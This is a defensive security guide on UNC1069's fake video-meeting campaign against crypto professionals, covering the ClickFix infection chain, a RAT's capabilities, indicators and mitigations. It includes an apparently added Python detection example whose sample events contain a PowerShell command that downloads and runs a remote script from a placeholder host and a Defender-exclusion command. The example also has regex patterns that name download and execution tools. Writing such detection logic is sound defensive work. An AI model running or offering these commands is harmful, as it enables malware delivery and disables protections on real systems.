In 2026, social engineering has evolved far beyond phishing emails. A newly uncovered campaign shows attackers hosting convincing fake Zoom and Microsoft Teams meetings to compromise victims in real time. This isn’t theoretical—it’s happening now.
A North Korea-linked threat group known as UNC1069 is targeting cryptocurrency professionals with highly orchestrated fake video calls, leveraging trust, urgency, and technical deception to deploy malware and steal digital assets.
For CISOs, SOC analysts, and security engineers, this represents a dangerous convergence of deepfake technology, social engineering, and endpoint compromise.
In this guide, you’ll learn:
- How the fake video meetings cyberattack works end-to-end
- The technical mechanisms behind the malware delivery
- Real-world attack chain insights from threat intelligence
- Key detection signals and defensive strategies
- Best practices aligned with modern frameworks like Zero Trust and MITRE ATT&CK
What Is the Fake Video Meetings Cyberattack?
The fake video meetings cyberattack is a sophisticated social engineering operation where attackers impersonate legitimate business contacts and lure victims into joining counterfeit video conferencing platforms.
Key Characteristics
- Impersonation of venture capital firms
- Use of LinkedIn and Telegram for initial contact
- Scheduling via legitimate tools like Calendly
- Fake platforms mimicking:
  - Zoom
  - Microsoft Teams
  - Google Meet
- Real-time interaction with attackers (sometimes using deepfake video)
Once trust is established, the victim is manipulated into executing malicious code under the guise of fixing technical issues.
How the UNC1069 Attack Chain Works
Understanding the full attack lifecycle is critical for detection and prevention.
1. Initial Access (Social Engineering)
Attackers initiate contact via:
- LinkedIn (often compromised accounts)
- Telegram messaging
They pose as:
- Investors
- Web3 partners
- Venture capital firms
Goal: Build credibility over time.
2. Meeting Setup via Trusted Tools
Victims receive:
- Calendly links
- Invitations to what appear to be legitimate meetings
These links redirect to spoofed conferencing platforms that closely resemble real ones.
3. Fake Meeting Environment
The environment includes:
- Functional UI similar to Zoom/Teams
- Live interaction with attackers
- In some cases, deepfake video of executives
Psychological trigger: Trust + urgency.
4. ClickFix Social Engineering Technique
During the meeting:
- Victim is told their mic or camera isn’t working
- A prompt appears instructing them to fix the issue
The prompt asks users to:
- Copy and paste a command
- Execute it in a terminal
This is the infection point.
5. Malware Deployment (Cabbage RAT Variant)
Once executed:
- PowerShell scripts are downloaded
- A VBScript payload is deployed
- Malware establishes persistence and begins data collection
Technical Breakdown of the Malware
The malware used is a variant of Cabbage RAT (CageyChameleon), tailored for different operating systems.
Capabilities
- System reconnaissance:
  - Username
  - Hostname
  - OS version
- Browser extension harvesting:
  - Focus on crypto wallets
- Command-and-control (C2) communication
- Persistent execution via startup shortcuts
Windows-Specific Infection Flow
- User opens admin terminal via shortcut keys
- Executes attacker-provided command
- PowerShell downloads:
  - Script 1: Retrieves VBScript payload
  - Script 2: Configures system changes
Defense Evasion Techniques
- Adds exclusions to Windows Defender
- Restarts security services
- Executes scripts from temporary directories
Advanced Data Exfiltration Techniques
This campaign goes beyond traditional malware.
Real-Time Audio/Video Capture
Using browser APIs:
- navigator.mediaDevices.getUserMedia
- WebRTC and WebSocket communication
Impact
- Live recording of victims
- Data streamed to attacker-controlled servers
- Footage reused for:
  - Future impersonation
  - More convincing social engineering attacks
This creates a dangerous feedback loop of identity compromise.
Real-World Threat Intelligence Insights
Security researchers identified:
- Full attack chain mapped in April 2026
- Infrastructure supporting multiple OS payloads
- Links to:
  - Axios NPM package compromise
  - Known North Korean threat clusters (e.g., Bluenoroff)
Risk Implications
- Financial theft (cryptocurrency wallets)
- Corporate espionage
- Identity-based attacks using recorded media
Common Mistakes Organizations Make
Even mature security teams can fall for this type of attack.
Critical Missteps
- Trusting meeting invites without verification
- Allowing users to execute terminal commands freely
- Lack of endpoint monitoring for script execution
- Insufficient awareness of real-time social engineering threats
Detection & Threat Hunting Strategies
Security teams should align detection with frameworks like MITRE ATT&CK.
Key Indicators of Compromise (IOCs)
- Execution of scripts from:
  - Temp directories
  - Unsigned sources
- Unexpected:
  - PowerShell activity
  - VBScript execution
- Windows Defender exclusions being modified
- Outbound traffic to:
  - Domains mimicking Zoom/Meet/Teams
Behavioral Detection Signals
- Users running terminal commands during meetings
- Browser requests accessing media devices unexpectedly
- Abnormal WebRTC connections
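The IOCs and behavioral signals above translate directly into hunt logic. The Python below is an added example (not from the article or from any vendor product): it runs simple rules over constructed Sysmon-style process-creation events (Image, ParentImage and CommandLine are the real Sysmon Event ID 1 field names; the sample events, paths and the .invalid domain are made up) and flags the stages described in the Windows infection flow: a PowerShell download cradle, a Defender exclusion being added, and a VBScript launched by PowerShell from a temp directory.

```python
import re

# Constructed Sysmon-style process-creation events (hypothetical sample data, not from the campaign).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -nop -w hidden -c iex (iwr http://meet-join.invalid/s1.ps1)"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Add-MpPreference -ExclusionPath C:\Users\alice\AppData\Local\Temp"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\update.vbs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\ops\nightly-backup.ps1"},   # benign admin task
]

TEMP_DIR = re.compile(r"\\Temp\b|%TEMP%|\$env:TEMP", re.I)           # execution from temp directories
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)
EXECUTE = re.compile(r"Invoke-Expression|\biex\b", re.I)
DEFENDER_EXCL = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return the detection labels that fire for one process-creation event."""
    exe, parent = basename(event["Image"]), basename(event.get("ParentImage", ""))
    cmd = event["CommandLine"]
    hits = []
    if exe in POWERSHELL:
        if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):   # stage 1: script downloaded and run in memory
            hits.append("powershell_download_cradle")
        if DEFENDER_EXCL.search(cmd):                      # defense evasion: Defender exclusion added
            hits.append("defender_exclusion_added")
    if exe in SCRIPT_HOSTS and re.search(r"\.vbs\b", cmd, re.I):
        hits.append("vbscript_execution")                  # stage 2: VBScript payload
        if parent in POWERSHELL:
            hits.append("vbscript_launched_by_powershell")
        if TEMP_DIR.search(cmd):
            hits.append("script_from_temp")
    if TEMP_DIR.search(event["Image"]):                    # any binary running out of a temp directory
        hits.append("binary_from_temp")
    return hits

def hunt(events):
    """Keep only events that fired at least one label, paired with their labels."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]
```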
Best Practices to Prevent Fake Video Meeting Attacks
1. Enforce Zero Trust Principles
- Verify all meeting invitations
- Require out-of-band validation for sensitive interactions
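One concrete form of "verify all meeting invitations" is to triage the invite link before anyone clicks it. The helper below is an added example (not from the article): it resolves the link's hostname and reports whether it is an allowlisted Zoom, Teams or Meet domain, a lookalike carrying a brand name outside that allowlist, or a punycode/IDN host that may hide a homoglyph. The allowlist and the sample links (.invalid TLD) are assumptions.

```python
from urllib.parse import urlsplit

# Assumed allowlist of legitimate apex domains for the platforms this campaign spoofs.
LEGIT_APEX = ("zoom.us", "teams.microsoft.com", "meet.google.com")
BRANDS = ("zoom", "teams", "meet")

def host_of(link):
    """Extract the lower-cased hostname from a URL or bare host (userinfo tricks are stripped)."""
    if "://" not in link:
        link = "https://" + link
    return (urlsplit(link).hostname or "").rstrip(".").lower()

def is_legit(host):
    """True only if host equals an allowlisted apex or is a subdomain of one."""
    return any(host == apex or host.endswith("." + apex) for apex in LEGIT_APEX)

def classify_invite(link):
    """Triage verdict for one invite link."""
    host = host_of(link)
    if not host:
        return "unparseable"
    if is_legit(host):
        return "legitimate"
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return "idn_or_punycode_host"   # possible homoglyph of a brand name
    if any(brand in host for brand in BRANDS):
        return "lookalike"              # brand string outside the allowlisted apex
    return "unknown"                    # not a conferencing host; confirm out of band

# Constructed invite links (hypothetical; .invalid is a reserved TLD).
SAMPLE_LINKS = [
    "https://us02web.zoom.us/j/5551234567",
    "https://zoom.us.join-meeting.invalid/j/5551234567",
    "https://us02web.zoom.us@meeting-host.invalid/j/1",
    "https://calendly.com/someone/30min",
]

def triage(links):
    """Map each link to its verdict so a help desk or mail gateway can act on it."""
    return {link: classify_invite(link) for link in links}
```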
2. Restrict Script Execution
- Disable or limit:
  - PowerShell (tighten the execution policy)
  - VBScript usage
- Monitor for:
  - Unauthorized script launches
3. Endpoint Detection & Response (EDR)
Deploy EDR solutions capable of:
- Detecting behavioral anomalies
- Blocking suspicious scripts
- Identifying persistence mechanisms
4. Security Awareness Training
Train employees to recognize:
- Urgent technical instructions during calls
- Requests to run commands
- Suspicious meeting platforms
Key rule:
👉 Never execute code during a video call.
5. Browser Security Controls
- Restrict access to media APIs
- Monitor WebRTC usage
- Implement isolation where possible
6. Crypto-Specific Protections
For Web3 organizations:
- Monitor wallet extension activity
- Use hardware wallets where possible
- Segment sensitive systems
Tools & Frameworks for Defense
| Category | Recommended Approach |
|---|---|
| Threat Detection | EDR/XDR platforms |
| Framework Alignment | MITRE ATT&CK |
| Compliance | NIST CSF, ISO 27001 |
| Identity Security | Zero Trust Architecture |
| Threat Intelligence | Continuous monitoring |
Expert Insights: Why This Attack Is So Effective
This campaign succeeds because it combines:
- Human trust exploitation
- Real-time interaction
- Technical sophistication
Unlike phishing emails, this attack:
- Feels legitimate
- Happens live
- Applies pressure
Risk Impact Analysis:
- High likelihood of execution
- High financial impact (crypto theft)
- Long-term identity compromise
FAQs
1. What is a fake video meetings cyberattack?
A fake video meetings cyberattack is a social engineering technique where attackers impersonate legitimate contacts and trick victims into joining malicious conferencing platforms to deliver malware.
2. How does UNC1069 infect victims?
UNC1069 uses fake meeting platforms and ClickFix-style prompts to trick users into executing malicious scripts, which install remote access trojans.
3. What makes this attack different from phishing?
Unlike phishing emails, this attack involves live interaction, deepfake elements, and real-time manipulation, making it far more convincing.
4. Who is most at risk?
- Cryptocurrency professionals
- Web3 developers
- Executives involved in partnerships or investments
5. How can organizations prevent these attacks?
By implementing:
- Zero Trust verification
- Endpoint monitoring
- Script execution controls
- Security awareness training
6. What should I do if I suspect compromise?
- Disconnect the affected system
- Initiate incident response procedures
- Analyze logs for script execution and outbound traffic
- Reset credentials and secure wallets
Conclusion
The fake video meetings cyberattack represents a major evolution in cyber threats—blending social engineering, deepfake technology, and advanced malware into a single attack vector.
For organizations in crypto, Web3, and beyond, this is a wake-up call.
Key Takeaways:
- Never trust meeting platforms blindly
- Treat command execution requests as critical threats
- Invest in behavioral detection and Zero Trust
As attackers become more sophisticated, your defenses must evolve accordingly.
Next Step:
Assess your organization’s exposure to social engineering threats and strengthen your endpoint and identity security posture today.